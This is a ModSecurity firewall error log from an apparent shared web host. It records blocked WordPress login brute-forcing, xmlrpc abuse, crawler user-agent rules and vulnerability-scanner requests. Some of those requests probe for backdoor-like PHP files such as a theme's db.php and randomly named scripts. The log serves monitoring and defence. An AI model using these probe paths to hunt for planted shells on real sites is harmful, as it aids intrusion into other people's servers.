[Tue May 26 17:23:24.953670 2026] [security2:error] [pid 882219:tid 882406] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJtJ8tTkZcqimiXcTySwAAAL4"]
[Tue May 26 17:23:25.221236 2026] [security2:error] [pid 882219:tid 882398] [client 49.13.130.29:2654] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWJtZ8tTkZcqimiXcTyXAAAALY"], referer: https://thegoodsporting.com
[Tue May 26 17:23:25.647551 2026] [security2:error] [pid 882219:tid 882470] [client 45.154.98.38:65259] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWJtZ8tTkZcqimiXcTybAAAAP4"]
[Tue May 26 17:23:26.399767 2026] [security2:error] [pid 882219:tid 882388] [client 45.154.98.38:56019] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWJtp8tTkZcqimiXcTyfAAAAKw"]
[Tue May 26 17:23:27.064253 2026] [security2:error] [pid 882219:tid 882393] [client 45.154.98.38:55743] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWJt58tTkZcqimiXcTyjAAAALE"]
[Tue May 26 17:23:27.772692 2026] [security2:error] [pid 882219:tid 882371] [client 45.154.98.38:49673] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWJt58tTkZcqimiXcTypQAAAJs"]
[Tue May 26 17:23:27.896980 2026] [security2:error] [pid 882219:tid 882466] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJt58tTkZcqimiXcTyngAAAPo"]
[Tue May 26 17:23:28.531072 2026] [security2:error] [pid 882219:tid 882357] [client 45.154.98.38:49768] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWJuJ8tTkZcqimiXcTyvAAAAI0"]
[Tue May 26 17:23:29.213405 2026] [security2:error] [pid 882219:tid 882385] [client 45.154.98.38:65132] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "aeromodellingconsultants.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWJuZ8tTkZcqimiXcTy0AAAAKk"]
[Tue May 26 17:23:30.078523 2026] [security2:error] [pid 882219:tid 882429] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJuZ8tTkZcqimiXcTy3QAAANU"]
[Tue May 26 17:23:30.803397 2026] [security2:error] [pid 882219:tid 882380] [client 223.235.98.214:11472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJup8tTkZcqimiXcTy8wAAAKQ"]
[Tue May 26 17:23:30.803670 2026] [security2:error] [pid 882219:tid 882380] [client 223.235.98.214:11472] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJup8tTkZcqimiXcTy8wAAAKQ"]
[Tue May 26 17:23:31.437546 2026] [security2:error] [pid 882219:tid 882447] [client 172.59.72.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJu58tTkZcqimiXcTy-QAAAOc"]
[Tue May 26 17:23:32.057186 2026] [security2:error] [pid 882219:tid 882448] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJu58tTkZcqimiXcTzCwAAAOg"]
[Tue May 26 17:23:32.246328 2026] [security2:error] [pid 882219:tid 882406] [client 203.194.101.7:52996] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJvJ8tTkZcqimiXcTzGQAAAL4"]
[Tue May 26 17:23:32.246456 2026] [security2:error] [pid 882219:tid 882406] [client 203.194.101.7:52996] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJvJ8tTkZcqimiXcTzGQAAAL4"]
[Tue May 26 17:23:33.605918 2026] [security2:error] [pid 882219:tid 882308] [remote 211.23.68.235:34193] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWJvZ8tTkZcqimiXcTzQQAA9Fg"]
[Tue May 26 17:23:34.979563 2026] [security2:error] [pid 882219:tid 882454] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJvp8tTkZcqimiXcTzYQAAAO4"]
[Tue May 26 17:23:36.739339 2026] [security2:error] [pid 882219:tid 882446] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJwJ8tTkZcqimiXcTzhwAAAOY"]
[Tue May 26 17:23:37.335201 2026] [security2:error] [pid 882219:tid 882223] [remote 57.141.2.25:22900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 25.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWJwZ8tTkZcqimiXcTzngAAzQM"]
[Tue May 26 17:23:39.655026 2026] [security2:error] [pid 882219:tid 882349] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJw58tTkZcqimiXcTz2QAAAIU"]
[Tue May 26 17:23:40.193919 2026] [security2:error] [pid 882219:tid 882437] [client 181.177.86.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWJxJ8tTkZcqimiXcTz8AAAAN0"], referer: https://www.anujtradingco.com/
[Tue May 26 17:23:41.301111 2026] [security2:error] [pid 882219:tid 882456] [client 181.177.86.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWJxZ8tTkZcqimiXcT0CQAAAPA"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1451658&moderation-hash=e1d6a6b8e4284daf45d45ed63eb70ee7
[Tue May 26 17:23:41.881162 2026] [security2:error] [pid 882219:tid 882370] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJxZ8tTkZcqimiXcT0FQAAAJo"]
[Tue May 26 17:23:42.242702 2026] [security2:error] [pid 882219:tid 882362] [client 142.147.109.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWJxp8tTkZcqimiXcT0KgAAAJI"], referer: https://www.anujtradingco.com/
[Tue May 26 17:23:42.732155 2026] [security2:error] [pid 882219:tid 882380] [client 203.194.101.7:53329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJxp8tTkZcqimiXcT0NQAAAKQ"]
[Tue May 26 17:23:42.732373 2026] [security2:error] [pid 882219:tid 882380] [client 203.194.101.7:53329] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJxp8tTkZcqimiXcT0NQAAAKQ"]
[Tue May 26 17:23:43.779446 2026] [security2:error] [pid 882219:tid 882469] [client 171.4.83.45:40958] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "soto-plumbing.com"] [uri "/wp-comments-post.php"] [unique_id "ahWJx58tTkZcqimiXcT0RgAAAP0"]
[Tue May 26 17:23:44.224542 2026] [security2:error] [pid 882219:tid 882417] [client 142.147.109.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWJyJ8tTkZcqimiXcT0aQAAAMk"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1231675&moderation-hash=b9f3913f537919d09439896dc0e6dc48
[Tue May 26 17:23:44.410571 2026] [security2:error] [pid 882219:tid 882389] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJx58tTkZcqimiXcT0XAAAAK0"]
[Tue May 26 17:23:44.876425 2026] [security2:error] [pid 882219:tid 882469] [client 171.4.83.45:40958] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "soto-plumbing.com"] [uri "/wp-comments-post.php"] [unique_id "ahWJx58tTkZcqimiXcT0RgAAAP0"]
[Tue May 26 17:23:44.876483 2026] [security2:error] [pid 882219:tid 882469] [client 171.4.83.45:40958] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "soto-plumbing.com"] [uri "/wp-comments-post.php"] [unique_id "ahWJx58tTkZcqimiXcT0RgAAAP0"]
[Tue May 26 17:23:44.980953 2026] [security2:error] [pid 882219:tid 882437] [client 74.7.241.177:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "veganfoodindia.com"] [uri "/index.php"] [unique_id "ahWJyJ8tTkZcqimiXcT0bAAAAN0"]
[Tue May 26 17:23:44.982091 2026] [security2:error] [pid 882219:tid 882382] [client 74.7.241.177:43514] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "veganfoodindia.com"] [uri "/robots.txt"] [unique_id "ahWJyJ8tTkZcqimiXcT0agAApgw"]
[Tue May 26 17:23:46.224595 2026] [security2:error] [pid 882219:tid 882468] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJyZ8tTkZcqimiXcT0mAAAAPw"]
[Tue May 26 17:23:48.485097 2026] [security2:error] [pid 882219:tid 882398] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJzJ8tTkZcqimiXcT01AAAALY"]
[Tue May 26 17:23:48.713337 2026] [security2:error] [pid 882219:tid 882414] [client 160.250.132.165:49741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcontacts.virgence.com"] [uri "/wp-login.php"] [unique_id "ahWJzJ8tTkZcqimiXcT04AAAAMY"]
[Tue May 26 17:23:48.827814 2026] [security2:error] [pid 882219:tid 882248] [remote 46.101.75.237:57936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWJzJ8tTkZcqimiXcT04wAAtRw"]
[Tue May 26 17:23:49.583098 2026] [security2:error] [pid 882219:tid 882254] [remote 45.136.17.84:40250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.17.136.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWJzZ8tTkZcqimiXcT09gAAwyI"]
[Tue May 26 17:23:49.991890 2026] [security2:error] [pid 882219:tid 882473] [client 181.177.110.72:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWJzZ8tTkZcqimiXcT1BQAAAQE"], referer: http://anujtradingco.com/
[Tue May 26 17:23:50.196467 2026] [security2:error] [pid 882219:tid 882389] [client 20.206.67.134:5597] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWJzp8tTkZcqimiXcT1CwAAAK0"], referer: www.google.com
[Tue May 26 17:23:50.285019 2026] [security2:error] [pid 882219:tid 882361] [client 114.119.131.206:27547] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWJzp8tTkZcqimiXcT1DwAAAJE"], referer: http://haddingtonwines.com/cart?remove_item=096d3a817a272647f4ada2d6d733a8fb
[Tue May 26 17:23:50.298670 2026] [security2:error] [pid 882219:tid 882423] [client 20.206.67.134:8620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-plain.php"] [unique_id "ahWJzp8tTkZcqimiXcT1EAAAAM8"], referer: www.google.com
[Tue May 26 17:23:50.561729 2026] [security2:error] [pid 882219:tid 882385] [client 160.250.132.165:50857] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJzp8tTkZcqimiXcT1GgAAAKk"]
[Tue May 26 17:23:50.670794 2026] [security2:error] [pid 882219:tid 882378] [client 20.206.67.134:9227] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jhonparra.com"] [uri "/index.php"] [unique_id "ahWJzp8tTkZcqimiXcT1CQAAAKI"], referer: www.google.com
[Tue May 26 17:23:51.173191 2026] [security2:error] [pid 882219:tid 882283] [remote 46.101.75.237:57944] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWJz58tTkZcqimiXcT1LgAAxD8"]
[Tue May 26 17:23:51.213132 2026] [security2:error] [pid 882219:tid 882407] [client 20.206.67.134:1681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWJz58tTkZcqimiXcT1LwAAAL8"], referer: www.google.com
[Tue May 26 17:23:51.237493 2026] [security2:error] [pid 882219:tid 882460] [client 20.206.67.134:1129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-plain.php"] [unique_id "ahWJz58tTkZcqimiXcT1NAAAAPQ"], referer: www.google.com
[Tue May 26 17:23:51.237951 2026] [security2:error] [pid 882219:tid 882425] [client 20.206.67.134:1641] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/uzdzwmkj.php"] [unique_id "ahWJz58tTkZcqimiXcT1NQAAANE"], referer: www.google.com
[Tue May 26 17:23:51.303381 2026] [security2:error] [pid 882219:tid 882468] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJzp8tTkZcqimiXcT1JAAAAPw"]
[Tue May 26 17:23:51.322910 2026] [security2:error] [pid 882219:tid 882418] [client 20.206.67.134:9227] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jhonparra.com"] [uri "/index.php"] [unique_id "ahWJz58tTkZcqimiXcT1MwAAAMo"], referer: www.google.com
[Tue May 26 17:23:52.100818 2026] [security2:error] [pid 882219:tid 882363] [client 223.235.98.214:17612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJz58tTkZcqimiXcT1SwAAAJM"]
[Tue May 26 17:23:52.101018 2026] [security2:error] [pid 882219:tid 882363] [client 223.235.98.214:17612] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJz58tTkZcqimiXcT1SwAAAJM"]
[Tue May 26 17:23:52.169482 2026] [security2:error] [pid 882219:tid 882373] [client 20.206.67.134:1637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/yjwdleqd.php"] [unique_id "ahWJ0J8tTkZcqimiXcT1XQAAAJ0"], referer: www.google.com
[Tue May 26 17:23:52.356702 2026] [security2:error] [pid 882219:tid 882439] [client 160.250.132.165:51857] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "healthcarecoinbase.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ0J8tTkZcqimiXcT1ZQAAAN8"]
[Tue May 26 17:23:52.551021 2026] [security2:error] [pid 882219:tid 882434] [client 114.119.138.154:61105] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "politica-global.com"] [uri "/libreria-/35-audio-libro-de-el-estratega.html"] [unique_id "ahWJ0J8tTkZcqimiXcT1awAAANo"], referer: https://politica-global.com/
[Tue May 26 17:23:52.742156 2026] [security2:error] [pid 882219:tid 882422] [client 203.194.101.7:53659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ0J8tTkZcqimiXcT1bwAAAM4"]
[Tue May 26 17:23:52.742281 2026] [security2:error] [pid 882219:tid 882422] [client 203.194.101.7:53659] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ0J8tTkZcqimiXcT1bwAAAM4"]
[Tue May 26 17:23:53.855079 2026] [security2:error] [pid 882219:tid 882364] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ0Z8tTkZcqimiXcT1vgAAAJQ"]
[Tue May 26 17:23:54.113115 2026] [security2:error] [pid 882219:tid 882463] [client 160.250.132.165:52878] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.drumstonemedia.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ0p8tTkZcqimiXcT12QAAAPc"]
[Tue May 26 17:23:54.206705 2026] [security2:error] [pid 882219:tid 882350] [client 109.181.69.187:58889] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWJ0p8tTkZcqimiXcT10gAAhm4"], referer: https://haddingtonwines.com/products/lindlime-gin/
[Tue May 26 17:23:54.544019 2026] [security2:error] [pid 882219:tid 882438] [client 109.181.69.187:58889] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWJ0p8tTkZcqimiXcT15AAA3mc"], referer: https://haddingtonwines.com/products/lindlime-gin/
